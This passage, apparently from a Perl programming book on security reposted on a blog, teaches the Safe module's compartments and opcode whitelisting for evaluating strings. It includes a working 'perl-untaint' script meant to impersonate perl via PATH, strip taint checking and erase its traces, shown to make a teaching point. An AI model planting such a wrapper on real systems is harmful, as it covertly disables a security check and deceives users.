method:# safe-root.pl use v5.16; use Safe 2.35; { my $compartment = Safe->new; my $root = $compartment->root; say "Safe namespace is $root"; }
When I run this, I don’t see it mention
main::
:% perl safe-root.pl
Safe namespace is Safe::Root0
If I were trying to be clever, I could try to define methods in that namespace to trick it into running something. The
DESTROY
and AUTOLOAD
methods typically aren’t called explicitly so they make good vectors
for sneak attacks. I might try this, where outside the compartment I
define a method in the namespace of the compartment:# safe-root.pl use v5.16; use Safe 2.35; { my $compartment = Safe->new; my $root = $compartment->root; say "Safe namespace is $root"; no strict 'refs'; *{ $root . '::DESTROY' } = sub { my( $self, $arg ) = @_; $arg //= 'default'; say "Calling DESTROY with $self $arg"; }; say "$root can DESTROY" if $root->can( 'DESTROY' ); $root->DESTROY( 'Explicit' ); }
When I run this, I see that I was able to define the
DESTROY
method and call it explicitly as a class method, but I don’t get any output from $compartment
goes out of scope when I might expect it to be called as an instance method:% perl safe-root.pl
Safe namespace is Safe::Root0
Safe::Root0 can DESTROY
Calling DESTROY with Safe::Root0 Explicit
Compare this to the equivalent “unsafe” code where I create a do nothing class with the same methods:
# unsafe.pl use v5.10; package Unsafe { sub new { bless {}, $_[0] } sub root { __PACKAGE__ } } { my $compartment = Unsafe->new; my $root = $compartment->root; say "Unsafe namespace is $root"; no strict 'refs'; *{ $root . '::DESTROY' } = sub { my( $self, $arg ) = @_; $arg //= 'default'; say "Calling DESTROY with $self $arg"; }; say "$root can DESTROY" if $root->can( 'DESTROY' ); $root->DESTROY( 'Explicit' ); }
When I run that program, I see two calls to
DESTROY
, one of which is a class method call and one which is% perl unsafe.pl
Unsafe namespace is Unsafe
Unsafe can DESTROY
Calling DESTROY with Unsafe Explicit
Calling DESTROY with Unsafe=HASH(0x7fdf59005468) default
So, when would I want to use this? In the rare
case where I want to evaluate a bit of Perl that I get as a string,
perhaps from configuration (although see Chapter 11
for why you should avoid that), serialization, or something else. For
instance, I want to take a simple addition in the form of a string such
as
"2 + 2"
, and get the answer to the arithmetic. Instead of using a normal string eval
, I can use Safe
‘s reval
.
I’ll start with a simple REPL program where
someone enters a line and I return the answer only when they are doing
exactly what I need. I start by creating a
Safe
compartment where I deny everything:# add-repl.pl use v5.16; use Safe 2.35; my $compartment = Safe->new; $compartment->deny( qw(:default) ); LINE: while( <> ) { chomp; my $result = $compartment->reval( $_ ) or do { my $error = $@; warn "\tSafe compartment error for [$_]! $error"; next LINE; }; say "$_ = $result"; }
When I try to run this, the compartment catches everything because I’ve allowed nothing:
% perl safe-repl.pl
2 + 2
Safe compartment error for [2 + 2]! 'constant item' trapped
The problem is that
Safe
gives me a description of the operation it trapped, not the opcode
name. That’s okay. I can see the complete map with a one-liner. It’s a
long list that I extract here:% perl -MOpcode=opdump -e opdump
const constant item
padany private value
rv2gv ref-to-glob cast
leaveeval eval "string" exit
If I want to find the ones that include a string, I can give
opdump
an argument:% perl -MOpcode=opdump -e 'opdump shift' item
const constant item
So, I modify my program to allow
const
:my $compartment = Safe->new; $compartment->deny( qw(:default) ); $compartment->permit( qw(const) );
When I try again, I get a different violation:
% perl safe-repl.pl
2 + 2
Safe compartment error for [2 + 2]! 'ref-to-glob cast' trapped
So, I find that opcode name:
% perl -MOpcode=opdump -e 'opdump shift' ref-to-glob
rv2gv ref-to-glob cast
I add that to the operations I permit:
my $compartment = Safe->new; $compartment->deny( qw(:default) ); $compartment->permit( qw(const rv2gv) );
I try again, and again, to eventually I’ve sussed out all of the opcodes I need:
my $compartment = Safe->new; $compartment->deny( qw(:default) ); $compartment->permit( qw(const rv2gv lineseq padany add leaveeval) );
If you’re one of the very few Perlers who know
the opcodes just by looking at the code, you probably don’t have to go
through this process. Now I have something that almost works:
% perl safe-repl.pl
2 + 2
2 + 2 = 4
I say “almost” because I’ve denied many opcodes
but I haven’t limited all the undesirable statements that someone can
make out of those. For instance, I can have a statement that has no
addition in it, or a syntax error:
% perl5.18.0 safe-repl.pl
2 + 2
2 + 2 = 4
2
2 = 2
2 3 4
Number found where operator expected
(Missing operator before 3?)
Number found where operator expected
(Missing operator before 4?)
Safe compartment error for [2 3 4]! syntax error
Safe Limitations
The
Safe
module has other limitations. It’s not going to keep the code I allow
from using up all the memory or CPU. If I allow operations such as chdir
, the rest of the program my see those side effects, and so on. As with the other things I have shown in this chapter, Safe
doesn’t prevent bad things from ever happening. It makes someone work a
lot harder to exploit problems, but only with careful programming and
attention.A Little Fun
Here’s a program that pretends to be the real perl, exploiting the same
PATH
insecurity the real perl catches. If I can trick you into thinking this program is perl,
probably by putting it somewhere close to the front of your path, taint
checking does you no good. It scrubs the argument list to remove -T
, then scrubs the shebang line to do the same thing. It saves the new program, then runs it with a real perl which it gets from PATH
(excluding itself, of course). Taint checking is a tool, not a cure. It
tells me where I need to do some work. Have I said that enough yet?#!/usr/bin/perl # perl-untaint (rename as just 'perl') use File::Basename; # get rid of -T on command line my @args = grep { ! /-T/ } @ARGV; # determine program name. Usually that's the first thing # after the switches (or the '--' which ends switches). This # won't work if the last switch takes an argument, but handling # that is just a matter of work. my( $double ) = grep { $args[$_] eq '--' } 0 .. $#args; my @single = grep { $args[$_] =~ m/^-/ } 0 .. $#args; my $program_index = do { if( $double ) { $double + 1 } elsif( @single ) { $single[-1] + 1 } else { 0 } }; my $program = splice @args, $program_index, 1, undef; unless( -e $program ) { warn qq|Can't open perl program "$program": No such file or directory\n|; exit; } # save the program to another location (current dir probably works) my $modified_program = basename( $program ) . ".evil"; splice @args, $program_index, 1, $modified_program; open FILE, '<', $program; open TMP, '>', $modified_program or exit; # quiet! my $shebang = <FILE>; $shebang =~ s/-T//; print TMP $shebang, <FILE>; # find out who I am (the first thing in the path) and take out that dir # this is especially useful if . is in the path. my $my_dir = dirname( `which perl` ); $ENV{PATH} = join ":", grep { $_ ne $my_dir and $_ ne '.' } split /:/, $ENV{PATH}; # find the real perl now that I've reset the path chomp( my $Real_perl = `which perl` ); # run the program with the right perl but without taint checking system("$Real_perl @args"); # clean up. We were never here. unlink $modified_program;
So there it is. When you think you have it
figured out, someone is going to find another way. Even Samuel L.
Jackson as a sysadmin couldn’t hold off the dinosaurs.
Summary
Perl knows that injudiciously passing around
data can cause problems, and has features to give me, the programmer,
ways to handle that. Taint checking is a tool that helps me find parts
of the program that try to pass external data to resources outside of
the program. Perl intends for me to scrutinize these data and turn them
into something I can trust before I use them. Checking and scrubbing the
data isn’t the only answer, and I need to program defensively using the
other security features Perl offers. Even then, taint checking doesn’t
ensure I’m completely safe and I still need to carefully consider the
entire security environment just as I would with any other programming
language.
Further Reading
Start with the perlsec documentation, which gives an overview of secure programming techniques for Perl.
The perltaint documentation gives the full details on taint checking. The entries in perlfunc for
system
and exec
talk about their security features.
The perlfunc documentation explains everything the
open
built-in can do, and there is even more in perlopentut.
Rafaël Garcia-Suarez shows off the
Safe
module for the http://www.perladvent.org/2012/2012-12-07.html.
Although targeted toward web applications, the http://www.owasp.org/ has plenty of good advice for all types of applications.
The Software Engineering Institute has a https://www.securecoding.cert.org/confluence/display/perl/CERT+Perl+Secure+Coding+Standard.
Even if you don’t want to read warnings from the Computer Emergency Response Team (CERT, http://www.cert.org) or SecurityFocus (http://www.securityfocus.com/), reading some of their advisories about perl interpreters or programs is often instructive.
http://www.cert.org/secure-coding/scale/ can validate Perl code. They’ll even issue a certificate of conformance.
The documentation for
DBI
has more information about placeholders and bind parameters, as well as TaintIn
and TaintOut
. Programming the Perl DBI by Tim Bunce and Alligator Descartes is another good source, although it does not cover the newer taint features of DBI
.
Andy Lester collates several resources about SQL Injection at http://bobby-tables.com/, which takes its name from an http://xkcd.com/327/ cartoon about a student who uses SQL injection to delete his school’s database.
Mark Jason Dominus covers the “stupidity” of using a variable name from a variable in http://perl.plover.com/varvarname.html.
Mark Jason Dominus talks about the “Prussian” and “American” stances in his http://perl.plover.com/yak/security/ talk.
There are many resources that discuss SQL
injection attacks, and you shouldn’t limit yourself to reading just the
ones that use Perl as an example.
ref : http://chimera.labs.oreilly.com/books/1234000001527/ch03.html#vicunas-03-9
Tidak ada komentar:
Posting Komentar